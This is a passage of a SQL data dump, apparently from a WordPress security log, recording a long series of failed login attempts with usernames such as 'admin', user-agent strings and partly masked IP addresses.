ipnadanot.org'),(236352,40192,'failed_username','wadminw'),(236353,40192,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36'),(236354,40192,'_message_key','user_unknown_login_failed'),(236355,40192,'_server_remote_addr','67.205.12.x'),(236356,40193,'failed_username','admin'),(236357,40193,'server_http_user_agent','Mozilla/5.0'),(236358,40193,'_message_key','user_unknown_login_failed'),(236359,40193,'_server_remote_addr','20.168.9.x'),(236360,40194,'failed_username','admin'),(236361,40194,'server_http_user_agent','Mozilla/5.0'),(236362,40194,'_message_key','user_unknown_login_failed'),(236363,40194,'_server_remote_addr','20.168.8.x'),(236364,40195,'failed_username','admin'),(236365,40195,'server_http_user_agent','Mozilla/5.0'),(236366,40195,'_message_key','user_unknown_login_failed'),(236367,40195,'_server_remote_addr','103.90.163.x'),(236368,40196,'failed_username','admin'),(236369,40196,'server_http_user_agent','Mozilla/5.0'),(236370,40196,'_message_key','user_unknown_login_failed'),(236371,40196,'_server_remote_addr','20.168.9.x'),(236372,40197,'failed_username','admin'),(236373,40197,'server_http_user_agent','Mozilla/5.0'),(236374,40197,'_message_key','user_unknown_login_failed'),(236375,40197,'_server_remote_addr','20.168.9.x'),(236376,40198,'failed_username','admin'),(236377,40198,'server_http_user_agent','Mozilla/5.0'),(236378,40198,'_message_key','user_unknown_login_failed'),(236379,40198,'_server_remote_addr','20.168.8.x'),(236380,40199,'failed_username','wwwadmin'),(236381,40199,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36'),(236382,40199,'_message_key','user_unknown_login_failed'),(236383,40199,'_server_remote_addr','141.94.247.x'),(236384,40200,'failed_username','admin'),(236385,40200,'server_http_user_agent','Mozilla/5.0'),(236386,40200,'_message_key','user_unknown_login_failed'),(236425,40210,'failed_username','admin'),(236424,40209,'_server_remote_addr','20.168.8.x'),(236423,40209,'_message_key','user_unknown_login_failed'),(236422,40209,'server_http_user_agent','Mozilla/5.0'),(236421,40209,'failed_username','admin'),(236420,40208,'_server_remote_addr','103.90.163.x'),(236419,40208,'_message_key','user_unknown_login_failed'),(236418,40208,'server_http_user_agent','Mozilla/5.0'),(236417,40208,'failed_username','admin'),(236415,40207,'_message_key','user_unknown_login_failed'),(236416,40207,'_server_remote_addr','20.168.9.x'),(236414,40207,'server_http_user_agent','Mozilla/5.0'),(236413,40207,'failed_username','admin'),(236412,40206,'_server_remote_addr','81.161.229.x'),(236411,40206,'_xmlrpc_request','true'),(236410,40206,'_message_key','user_unknown_login_failed'),(236409,40206,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(236408,40206,'failed_username','admin'),(236407,40205,'_server_remote_addr','20.168.9.x'),(236406,40205,'_message_key','user_unknown_login_failed'),(236405,40205,'server_http_user_agent','Mozilla/5.0'),(236404,40205,'failed_username','admin'),(236387,40200,'_server_remote_addr','103.90.163.x'),(236388,40201,'failed_username','admin'),(236389,40201,'server_http_user_agent','Mozilla/5.0'),(236390,40201,'_message_key','user_unknown_login_failed'),(236391,40201,'_server_remote_addr','20.168.9.x'),(236392,40202,'failed_username','admin'),(236393,40202,'server_http_user_agent','Mozilla/5.0'),(236394,40202,'_message_key','user_unknown_login_failed'),(236395,40202,'_server_remote_addr','20.168.9.x'),(236396,40203,'failed_username','admin'),(236397,40203,'server_http_user_agent','Mozilla/5.0'),(236398,40203,'_message_key','user_unknown_login_failed'),(236399,40203,'_server_remote_addr','103.90.163.x'),(236400,40204,'failed_username','admin'),(236401,40204,'server_http_user_agent','Mozilla/5.0'),(236402,40204,'_message_key','user_unknown_login_failed'),(236403,40204,'_server_remote_addr','20.168.8.x'),(236340,40189,'failed_username','admin'),(236341,40189,'server_http_user_agent','Mozilla/5.0'),(236342,40189,'_message_key','user_unknown_login_failed'),(236343,40189,'_server_remote_addr','20.168.8.x'),(236344,40190,'failed_username','admin'),(236345,40190,'server_http_user_agent','Mozilla/5.0'),(236346,40190,'_message_key','user_unknown_login_failed'),(236347,40190,'_server_remote_addr','103.90.163.x'),(236348,40191,'failed_username','admin'),(236349,40191,'server_http_user_agent','Mozilla/5.0'),(236350,40191,'_message_key','user_unknown_login_failed'),(236351,40191,'_server_remote_addr','20.168.9.x'),(236338,40188,'_message_key','user_unknown_login_failed'),(236339,40188,'_server_remote_addr','20.168.9.x'),(236337,40188,'server_http_user_agent','Mozilla/5.0'),(236336,40188,'failed_username','admin'),(236335,40187,'_server_remote_addr','103.90.163.x'),(236333,40187,'server_http_user_agent','Mozilla/5.0'),(236334,40187,'_message_key','user_unknown_login_failed'),(236332,40187,'failed_username','admin'),(236331,40186,'_server_remote_addr','20.168.9.x'),(236330,40186,'_message_key','user_unknown_login_failed'),(236329,40186,'server_http_user_agent','Mozilla/5.0'),(236328,40186,'failed_username','admin'),(236327,40185,'_server_remote_addr','161.35.218.x'),(236326,40185,'_message_key','user_unknown_login_failed'),(236325,40185,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),(236322,40184,'_message_key','user_unknown_login_failed'),(236323,40184,'_server_remote_addr','20.168.8.x'),(236324,40185,'failed_username','admin'),(236319,40183,'_server_remote_addr','20.168.9.x'),(236320,40184,'failed_username','admin'),(236321,40184,'server_http_user_agent','Mozilla/5.0'),(236318,40183,'_message_key','user_unknown_login_failed'),(236316,40183,'failed_username','admin'),(236317,40183,'server_http_user_agent','Mozilla/5.0'),(236315,40182,'_server_remote_addr','103.90.163.x'),(236281,40174,'server_http_user_agent','Mozilla/5.0'),(236282,40174,'_message_key','user_unknown_login_failed'),(236283,40174,'_server_remote_addr','20.168.8.x'),(236284,40175,'failed_username','admin'),(236285,40175,'server_http_user_agent','Mozilla/5.0'),(236286,40175,'_message_key','user_unknown_login_failed'),(236287,40175,'_server_remote_addr','20.168.9.x'),(236288,40176,'failed_username','admin'),(236289,40176,'server_http_user_agent','Mozilla/5.0'),(236290,40176,'_message_key','user_unknown_login_failed'),(236291,40176,'_server_remote_addr','20.168.9.x'),(236292,40177,'failed_username','admin'),(236293,40177,'server_http_user_agent','Mozilla/5.0'),(236294,40177,'_message_key','user_unknown_login_failed'),(236295,40177,'_server_remote_addr','103.90.163.x'),(236296,40178,'failed_username','admin'),(236297,40178,'server_http_user_agent','Mozilla/5.0'),(236298,40178,'_message_key','user_unknown_login_failed'),(236299,40178,'_server_remote_addr','20.168.9.x'),(236300,40179,'failed_username','admin'),(236301,40179,'server_http_user_agent','Mozilla/5.0'),(236302,40179,'_message_key','user_unknown_login_failed'),(236303,40179,'_server_remote_addr','20.168.8.x'),(236304,40180,'failed_username','admin'),(236305,40180,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),(236306,40180,'_message_key','user_unknown_login_failed'),(236307,40180,'_server_remote_addr','69.163.224.x'),(236308,40181,'failed_username','admin'),(236309,40181,'server_http_user_agent','Mozilla/5.0'),(236310,40181,'_message_key','user_unknown_login_failed'),(236311,40181,'_server_remote_addr','20.168.9.x'),(236312,40182,'failed_username','admin'),(236313,40182,'server_http_user_agent','Mozilla/5.0'),(236314,40182,'_message_key','user_unknown_login_failed'),(236278,40173,'_message_key','user_unknown_login_failed'),(236279,40173,'_server_remote_addr','35.187.58.x'),(236280,40174,'failed_username','admin'),(236275,40172,'_server_remote_addr','103.90.163.x'),(236276,40173,'failed_username','admin'),(236277,40173,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),(236274,40172,'_message_key','user_unknown_login_failed'),(236232,40162,'failed_username','admin'),(236233,40162,'server_http_user_agent','Mozilla/5.0'),(236234,40162,'_message_key','user_unknown_login_failed'),(236235,40162,'_server_remote_addr','20.168.8.x'),(236236,40163,'failed_username','admin'),(236237,40163,'server_http_user_agent','Mozilla/5.0'),(236238,40163,'_message_key','user_unknown_login_failed'),(236239,40163,'_server_remote_addr','20.168.9.x'),(236240,40164,'failed_username','admin'),(236241,40164,'server_http_user_agent','Mozilla/5.0'),(236242,40164,'_message_key','user_unknown_login_failed'),(236243,40164,'_server_remote_addr','103.90.163.x'),(236244,40165,'failed_username','admin'),(236245,40165,'server_http_user_agent','Mozilla/5.0'),(236246,40165,'_message_key','user_unknown_login_failed'),(236247,40165,'_server_remote_addr','20.168.9.x'),(236248,40166,'failed_username','admin'),(236249,40166,'server_http_user_agent','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),(236250,40166,'_message_key','user_unknown_login_failed'),(236251,40166,'_server_remote_addr','139.59.26.x'),(236252,40167,'failed_username','admin'),(236253,40167,'server_http_user_agent','Mozilla/5.0'),(236254,40167,'_message_key','user_unknown_login_failed'),(236255,40167,'_server_remote_addr','103.90.163.x'),(236256,40168,'failed_username','administrator'),(236257,40168,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'),(236258,40168,'_message_key','user_unknown_login_failed'),(236259,40168,'_server_remote_addr','104.244.79.x'),(236260,40169,'failed_username','admin'),(236261,40169,'server_http_user_agent','Mozilla/5.0'),(236262,40169,'_message_key','user_unknown_login_failed'),(236263,40169,'_server_remote_addr','20.168.8.x'),(236264,40170,'failed_username','admin'),(236265,40170,'server_http_user_agent','Mozilla/5.0'),(236266,40170,'_message_key','user_unknown_login_failed'),(236267,40170,'_server_remote_addr','20.168.9.x'),(236268,40171,'failed_username','admin'),(236269,40171,'server_http_user_agent','Mozilla/5.0'),(236270,40171,'_message_key','user_unknown_login_failed'),(236271,40171,'_server_remote_addr','20.168.9.x'),(236272,40172,'failed_username','admin'),(236273,40172,'server_http_user_agent','Mozilla/5.0'),(236197,40153,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.122 Safari/537.36'),(236231,40161,'_server_remote_addr','20.168.9.x'),(236229,40161,'server_http_user_agent','Mozilla/5.0'),(236230,40161,'_message_key','user_unknown_login_failed'),(236228,40161,'failed_username','admin'),(236227,40160,'_server_remote_addr','171.244.0.x'),(236226,40160,'_message_key','user_unknown_login_failed'),(236225,40160,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70 Safari/537.36'),(236224,40160,'failed_username','admin'),(236222,40159,'_message_key','user_unknown_login_failed'),(236223,40159,'_server_remote_addr','103.90.163.x'),(236221,40159,'server_http_user_agent','Mozilla/5.0'),(236220,40159,'failed_username','admin'),(236219,40158,'_server_remote_addr','20.168.9.x'),(236218,40158,'_message_key','user_unknown_login_failed'),(236217,40158,'server_http_user_agent','Mozilla/5.0'),(236216,40158,'failed_username','admin'),(236215,40157,'_server_remote_addr','20.168.8.x'),(236214,40157,'_message_key','user_unknown_login_failed'),(236213,40157,'server_http_user_agent','Mozilla/5.0'),(236211,40156,'_server_remote_addr','20.168.9.x'),(236212,40157,'failed_username','admin'),(236209,40156,'server_http_user_agent','Mozilla/5.0'),(236210,40156,'_message_key','user_unknown_login_failed'),(236208,40156,'failed_username','admin'),(236207,40155,'_server_remote_addr','103.90.163.x'),(236206,40155,'_message_key','user_unknown_login_failed'),(236205,40155,'server_http_user_agent','Mozilla/5.0'),(236204,40155,'failed_username','admin'),(236198,40153,'_message_key','user_unknown_login_failed'),(236199,40153,'_server_remote_addr','94.23.61.x'),(236200,40154,'failed_username','admin'),(236201,40154,'server_http_user_agent','Mozilla/5.0'),(236202,40154,'_message_key','user_unknown_login_failed'),(236203,40154,'_server_remote_addr','20.168.9.x'),(236193,40152,'server_http_user_agent','Mozilla/5.0'),(236194,40152,'_message_key','user_unknown_login_failed'),(236195,40152,'_server_remote_addr','20.168.8.x'),(236196,40153,'failed_username','admin'),(236192,40152,'failed_username','admin'),(236191,40151,'_server_remote_addr','20.168.9.x'),(236190,40151,'_message_key','user_unknown_login_failed'),(236189,40151,'server_http_user_agent','Mozilla/5.0'),(236188,40151,'failed_username','admin'),(236187,40150,'_server_remote_addr','103.90.163.x'),(236186,40150,'_message_key','user_unknown_login_failed'),(236183,40149,'_server_remote_addr','20.168.9.x'),(236184,40150,'failed_username','admin'),(236185,40150,'server_http_user_agent','Mozilla/5.0'),(236181,40149,'server_http_user_agent','Mozilla/5.0'),(236182,40149,'_message_key','user_unknown_login_failed'),(236179,40148,'_server_remote_addr','20.168.8.x'),(236180,40149,'failed_username','admin'),(236176,40148,'failed_username','admin'),(236177,40148,'server_http_user_agent','Mozilla/5.0'),(236178,40148,'_message_key','user_unknown_login_failed'),(236174,40147,'_message_key','user_unknown_login_failed'),(236175,40147,'_server_remote_addr','165.227.89.x'),(236173,40147,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36'),(236171,40146,'_server_remote_addr','20.168.9.x'),(236172,40147,'failed_username','admin'),(236167,40145,'_server_remote_addr','103.90.163.x'),(236168,40146,'failed_username','admin'),(236169,40146,'server_http_user_agent','Mozilla/5.0'),(236170,40146,'_message_key','user_unknown_login_failed'),(236165,40145,'server_http_user_agent','Mozilla/5.0'),(236166,40145,'_message_key','user_unknown_login_failed'),(236164,40145,'failed_username','admin'),(236163,40144,'_server_remote_addr','20.168.9.x'),(236159,40143,'_server_remote_addr','20.168.8.x'),(236160,40144,'failed_username','admin'),(236161,40144,'server_http_user_agent','Mozilla/5.0'),(236162,40144,'_message_key','user_unknown_login_failed'),(236158,40143,'_message_key','user_unknown_login_failed'),(236155,40142,'_server_remote_addr','20.168.9.x'),(236156,40143,'failed_username','admin'),(236157,40143,'server_http_user_agent','Mozilla/5.0'),(236151,40141,'_server_remote_addr','103.90.163.x'),(236152,40142,'failed_username','admin'),(236153,40142,'server_http_user_agent','Mozilla/5.0'),(236149,40141,'server_http_user_agent','Mozilla/5.0'),(236154,40142,'_message_key','user_unknown_login_failed'),(236150,40141,'_message_key','user_unknown_login_failed'),(236148,40141,'failed_username','admin'),(236147,40140,'_server_remote_addr','51.91.151.x'),(236145,40140,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36'),(236146,40140,'_message_key','user_unknown_login_failed'),(236144,40140,'failed_username','admin'),(236143,40139,'_server_remote_addr','45.61.186.x'),(236142,40139,'_message_key','user_unknown_login_failed'),(236139,40138,'_server_remote_addr','20.168.9.x'),(236140,40139,'failed_username','administrator'),(236141,40139,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36'),(236136,40138,'failed_username','admin'),(236137,40138,'server_http_user_agent','Mozilla/5.0'),(236138,40138,'_message_key','user_unknown_login_failed'),(236135,40137,'_server_remote_addr','20.168.8.x'),(236134,40137,'_message_key','user_unknown_login_failed'),(236131,40136,'_server_remote_addr','103.90.163.x'),(236132,40137,'failed_username','admin'),(236133,40137,'server_http_user_agent','Mozilla/5.0'),(236130,40136,'_message_key','user_unknown_login_failed'),(236128,40136,'failed_username','admin'),(236129,40136,'server_http_user_agent','Mozilla/5.0'),(236127,40135,'_server_remote_addr','20.168.9.x'),(236123,40134,'_server_remote_addr','157.230.191.x'),(236124,40135,'failed_username','admin'),(236125,40135,'server_http_user_agent','Mozilla/5.0'),(236126,40135,'_message_key','user_unknown_login_failed'),(236122,40134,'_message_key','user_unknown_login_failed'),(236120,40134,'failed_username','admin'),(236121,40134,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36'),(236119,40133,'_server_remote_addr','20.168.8.x'),(236118,40133,'_message_key','user_unknown_login_failed'),(236114,40132,'_message_key','user_unknown_login_failed'),(236115,40132,'_server_remote_addr','20.168.9.x'),(236116,40133,'failed_username','admin'),(236117,40133,'server_http_user_agent','Mozilla/5.0'),(236113,40132,'server_http_user_agent','Mozilla/5.0'),(236112,40132,'failed_username','admin'),(236109,40131,'server_http_user_agent','Mozilla/5.0'),(236110,40131,'_message_key','user_unknown_login_failed'),(236111,40131,'_server_remote_addr','103.90.163.x'),(236107,40130,'_server_remote_addr','20.168.9.x'),(236108,40131,'failed_username','admin'),(236104,40130,'failed_username','admin'),(236105,40130,'server_http_user_agent','Mozilla/5.0'),(236106,40130,'_message_key','user_unknown_login_failed'),(236103,40129,'_server_remote_addr','20.168.8.x'),(236102,40129,'_message_key','user_unknown_login_failed'),(236101,40129,'server_http_user_agent','Mozilla/5.0'),(236098,40128,'_message_key','user_unknown_login_failed'),(236099,40128,'_server_remote_addr','20.168.9.x'),(236100,40129,'failed_username','admin'),(236096,40128,'failed_username','admin'),(236097,40128,'server_http_user_agent','Mozilla/5.0'),(236095,40127,'_server_remote_addr','82.157.16.x'),(236094,40127,'_message_key','user_unknown_login_failed'),(236093,40127,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36'),(236092,40127,'failed_username','admin'),(236091,40126,'_server_remote_addr','103.90.163.x'),(236089,40126,'server_http_user_agent','Mozilla/5.0'),(236090,40126,'_message_key','user_unknown_login_failed'),(236087,40125,'_server_remote_addr','20.168.9.x'),(236088,40126,'failed_username','admin'),(236060,40119,'failed_username','admin'),(236061,40119,'server_http_user_agent','Mozilla/5.0'),(236062,40119,'_message_key','user_unknown_login_failed'),(236063,40119,'_server_remote_addr','20.168.9.x'),(236064,40120,'failed_username','admin'),(236065,40120,'server_http_user_agent','Mozilla/5.0'),(236066,40120,'_message_key','user_unknown_login_failed'),(236067,40120,'_server_remote_addr','20.168.9.x'),(236068,40121,'failed_username','admin'),(236069,40121,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36'),(236070,40121,'_message_key','user_unknown_login_failed'),(236071,40121,'_server_remote_addr','186.87.69.x'),(236072,40122,'failed_username','admin'),(236073,40122,'server_http_user_agent','Mozilla/5.0'),(236074,40122,'_message_key','user_unknown_login_failed'),(236075,40122,'_server_remote_addr','103.90.163.x'),(236076,40123,'failed_username','admin'),(236077,40123,'server_http_user_agent','Mozilla/5.0'),(236078,40123,'_message_key','user_unknown_login_failed'),(236079,40123,'_server_remote_addr','20.168.9.x'),(236080,40124,'failed_username','admin'),(236081,40124,'server_http_user_agent','Mozilla/5.0'),(236082,40124,'_message_key','user_unknown_login_failed'),(236083,40124,'_server_remote_addr','20.168.8.x'),(236084,40125,'failed_username','admin'),(236085,40125,'server_http_user_agent','Mozilla/5.0'),(236086,40125,'_message_key','user_unknown_login_failed'),(236036,40113,'server_http_user_agent','Mozilla/5.0'),(236037,40113,'_message_key','user_unknown_login_failed'),(236038,40113,'_server_remote_addr','20.168.9.x'),(236039,40114,'failed_username','admin'),(236040,40114,'server_http_user_agent','Mozilla/5.0'),(236041,40114,'_message_key','user_unknown_login_failed'),(236042,40114,'_server_remote_addr','103.90.163.x'),(236043,40115,'failed_username','admin'),(236044,40115,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36'),(236045,40115,'_message_key','user_unknown_login_failed'),(236046,40115,'_server_remote_addr','45.249.171.x'),(236047,40115,'_server_http_referer','https://paygear.ir/wp-login.php'),(236048,40116,'failed_username','admin'),(236049,40116,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36'),(236050,40116,'_message_key','user_unknown_login_failed'),(236051,40116,'_server_remote_addr','82.157.16.x'),(236052,40117,'failed_username','admin'),(236053,40117,'server_http_user_agent','Mozilla/5.0'),(236054,40117,'_message_key','user_unknown_login_failed'),(236055,40117,'_server_remote_addr','20.168.9.x'),(236056,40118,'failed_username','admin'),(236057,40118,'server_http_user_agent','Mozilla/5.0'),(236058,40118,'_message_key','user_unknown_login_failed'),(236059,40118,'_server_remote_addr','103.90.163.x'),(236034,40112,'_server_remote_addr','20.168.9.x'),(236035,40113,'failed_username','admin'),(236033,40112,'_message_key','user_unknown_login_failed'),(236032,40112,'server_http_user_agent','Mozilla/5.0'),(236031,40112,'failed_username','admin'),(236030,40111,'_server_remote_addr','103.90.163.x'),(236028,40111,'server_http_user_agent','Mozilla/5.0'),(236029,40111,'_message_key','user_unknown_login_failed'),(236027,40111,'failed_username','admin'),(236026,40110,'_server_remote_addr','20.168.9.x'),(236025,40110,'_message_key','user_unknown_login_failed'),(236024,40110,'server_http_user_agent','Mozilla/5.0'),(236023,40110,'failed_username','admin'),(236022,40109,'_server_remote_addr','156.54.11.x'),(236021,40109,'_message_key','user_unknown_login_failed'),(236020,40109,'server_http_user_agent','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),(236018,40108,'_server_remote_addr','20.168.9.x'),(236019,40109,'failed_username','admin'),(236017,40108,'_message_key','user_unknown_login_failed'),(236016,40108,'server_http_user_agent','Mozilla/5.0'),(236015,40108,'failed_username','admin'),(236014,40107,'_server_remote_addr','20.166.29.x'),(236013,40107,'_message_key','user_unknown_login_failed'),(236011,40107,'failed_username','admin'),(236012,40107,'server_http_user_agent','Mozilla/5.0'),(235966,40096,'failed_username','admin'),(235967,40096,'server_http_user_agent','Mozilla/5.0'),(235968,40096,'_message_key','user_unknown_login_failed'),(235969,40096,'_server_remote_addr','103.90.163.x'),(235970,40097,'failed_username','admin'),(235971,40097,'server_http_user_agent','Mozilla/5.0'),(235972,40097,'_message_key','user_unknown_login_failed'),(235973,40097,'_server_remote_addr','20.168.9.x'),(235974,40098,'failed_username','admin'),(235975,40098,'server_http_user_agent','Mozilla/5.0'),(235976,40098,'_message_key','user_unknown_login_failed'),(235977,40098,'_server_remote_addr','20.166.29.x'),(235978,40099,'failed_username','admin'),(235979,40099,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(235980,40099,'_message_key','user_unknown_login_failed'),(235981,40099,'_xmlrpc_request','true'),(235982,40099,'_server_remote_addr','172.233.154.x'),(235983,40100,'failed_username','admin'),(235984,40100,'server_http_user_agent','Mozilla/5.0'),(235985,40100,'_message_key','user_unknown_login_failed'),(235986,40100,'_server_remote_addr','20.168.9.x'),(235987,40101,'failed_username','admin'),(235988,40101,'server_http_user_agent','Mozilla/5.0'),(235989,40101,'_message_key','user_unknown_login_failed'),(235990,40101,'_server_remote_addr','103.90.163.x'),(235991,40102,'failed_username','admin'),(235992,40102,'server_http_user_agent','Mozilla/5.0'),(235993,40102,'_message_key','user_unknown_login_failed'),(235994,40102,'_server_remote_addr','20.166.29.x'),(235995,40103,'failed_username','admin'),(235996,40103,'server_http_user_agent','Mozilla/5.0'),(235997,40103,'_message_key','user_unknown_login_failed'),(235998,40103,'_server_remote_addr','20.168.9.x'),(235999,40104,'failed_username','admin'),(236000,40104,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36'),(236001,40104,'_message_key','user_unknown_login_failed'),(236002,40104,'_server_remote_addr','159.223.45.x'),(236003,40105,'failed_username','admin'),(236004,40105,'server_http_user_agent','Mozilla/5.0'),(236005,40105,'_message_key','user_unknown_login_failed'),(236006,40105,'_server_remote_addr','20.168.9.x'),(236007,40106,'failed_username','admin'),(236008,40106,'server_http_user_agent','Mozilla/5.0'),(236009,40106,'_message_key','user_unknown_login_failed'),(236010,40106,'_server_remote_addr','103.90.163.x'),(235965,40095,'_server_remote_addr','20.168.9.x'),(235964,40095,'_message_key','user_unknown_login_failed'),(235963,40095,'server_http_user_agent','Mozilla/5.0'),(235960,40094,'_message_key','user_unknown_login_failed'),(235961,40094,'_server_remote_addr','20.166.29.x'),(235962,40095,'failed_username','admin'),(235959,40094,'server_http_user_agent','Mozilla/5.0'),(235958,40094,'failed_username','admin'),(235955,40093,'server_http_user_agent','Mozilla/5.0'),(235956,40093,'_message_key','user_unknown_login_failed'),(235957,40093,'_server_remote_addr','20.168.9.x'),(235954,40093,'failed_username','admin'),(235953,40092,'_server_remote_addr','103.90.163.x'),(235952,40092,'_message_key','user_unknown_login_failed'),(235950,40092,'failed_username','admin'),(235951,40092,'server_http_user_agent','Mozilla/5.0'),(235949,40091,'_server_remote_addr','20.166.29.x'),(235948,40091,'_message_key','user_unknown_login_failed'),(235947,40091,'server_http_user_agent','Mozilla/5.0'),(235944,40090,'_message_key','user_unknown_login_failed'),(235945,40090,'_server_remote_addr','69.163.224.x'),(235946,40091,'failed_username','admin'),(235943,40090,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36'),(235940,40089,'_message_key','user_unknown_login_failed'),(235941,40089,'_server_remote_addr','20.168.9.x'),(235942,40090,'failed_username','admin'),(235939,40089,'server_http_user_agent','Mozilla/5.0'),(235938,40089,'failed_username','admin'),(235935,40088,'server_http_user_agent','Mozilla/5.0'),(235936,40088,'_message_key','user_unknown_login_failed'),(235937,40088,'_server_remote_addr','20.168.9.x'),(235934,40088,'failed_username','admin'),(235933,40087,'_server_remote_addr','103.90.163.x'),(235932,40087,'_message_key','user_unknown_login_failed'),(235930,40087,'failed_username','admin'),(235931,40087,'server_http_user_agent','Mozilla/5.0'),(235929,40086,'_server_remote_addr','20.166.29.x'),(235928,40086,'_message_key','user_unknown_login_failed'),(235927,40086,'server_http_user_agent','Mozilla/5.0'),(235924,40085,'_message_key','user_unknown_login_failed'),(235925,40085,'_server_remote_addr','20.168.9.x'),(235926,40086,'failed_username','admin'),(235923,40085,'server_http_user_agent','Mozilla/5.0'),(235922,40085,'failed_username','admin'),(235920,40084,'_message_key','user_unknown_login_failed'),(235921,40084,'_server_remote_addr','148.72.214.x'),(235919,40084,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36 MVisionPlayer/1.0.0.0'),(235918,40084,'failed_username','admin'),(235917,40083,'_server_remote_addr','20.166.29.x'),(235914,40083,'failed_username','admin'),(235915,40083,'server_http_user_agent','Mozilla/5.0'),(235916,40083,'_message_key','user_unknown_login_failed'),(235913,40082,'_server_remote_addr','20.168.9.x'),(235912,40082,'_message_key','user_unknown_login_failed'),(235910,40082,'failed_username','admin'),(235911,40082,'server_http_user_agent','Mozilla/5.0'),(235909,40081,'_server_remote_addr','103.90.163.x'),(235908,40081,'_message_key','user_unknown_login_failed'),(235907,40081,'server_http_user_agent','Mozilla/5.0'),(235904,40080,'_message_key','user_unknown_login_failed'),(235905,40080,'_server_remote_addr','107.189.7.x'),(235906,40081,'failed_username','admin'),(235903,40080,'server_http_user_agent','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/538.46 (KHTML, like Gecko) Version/8.0 Safari/538.46'),(235902,40080,'failed_username','admin'),(235899,40079,'server_http_user_agent','Mozilla/5.0'),(235900,40079,'_message_key','user_unknown_login_failed'),(235901,40079,'_server_remote_addr','20.168.9.x'),(235898,40079,'failed_username','admin'),(235895,40078,'server_http_user_agent','Mozilla/5.0'),(235896,40078,'_message_key','user_unknown_login_failed'),(235897,40078,'_server_remote_addr','20.166.29.x'),(235894,40078,'failed_username','admin'),(235892,40077,'_message_key','user_unknown_login_failed'),(235893,40077,'_server_remote_addr','35.205.224.x'),(235890,40077,'failed_username','admin'),(235891,40077,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36'),(235889,40076,'_server_remote_addr','20.168.9.x'),(235888,40076,'_message_key','user_unknown_login_failed'),(235886,40076,'failed_username','admin'),(235887,40076,'server_http_user_agent','Mozilla/5.0'),(235885,40075,'_server_remote_addr','103.90.163.x'),(235883,40075,'server_http_user_agent','Mozilla/5.0'),(235884,40075,'_message_key','user_unknown_login_failed'),(235882,40075,'failed_username','admin'),(235879,40074,'server_http_user_agent','Mozilla/5.0'),(235880,40074,'_message_key','user_unknown_login_failed'),(235881,40074,'_server_remote_addr','20.168.9.x'),(235878,40074,'failed_username','admin'),(235875,40073,'server_http_user_agent','Mozilla/5.0'),(235876,40073,'_message_key','user_unknown_login_failed'),(235877,40073,'_server_remote_addr','20.166.29.x'),(235874,40073,'failed_username','admin'),(235872,40072,'_message_key','user_unknown_login_failed'),(235873,40072,'_server_remote_addr','103.90.163.x'),(235869,40071,'_server_remote_addr','20.168.9.x'),(235870,40072,'failed_username','admin'),(235871,40072,'server_http_user_agent','Mozilla/5.0'),(235868,40071,'_message_key','user_unknown_login_failed'),(235867,40071,'server_http_user_agent','Mozilla/5.0'),(235864,40070,'_message_key','user_unknown_